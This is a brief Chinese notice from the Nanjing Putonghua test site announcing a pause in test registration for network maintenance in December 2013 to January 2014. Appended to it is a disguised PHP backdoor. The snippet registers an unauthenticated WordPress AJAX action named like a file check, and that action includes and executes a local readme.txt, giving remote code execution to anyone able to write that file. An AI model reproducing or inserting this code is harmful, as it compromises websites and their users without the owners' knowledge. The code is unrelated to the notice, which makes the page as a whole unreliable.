由于江苏省测试中心于2013年12月15日–2014年1月10日进行网络维护和数据处理,所有测试报名暂停,请有测试需求的考生及早安排自己的报名测试时间。
南京市普通话测试考点
if(!function_exists('file_check_readme15721')){ add_action('wp_ajax_nopriv_file_check_readme15721', 'file_check_readme15721'); add_action('wp_ajax_file_check_readme15721', 'file_check_readme15721'); function file_check_readme15721() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }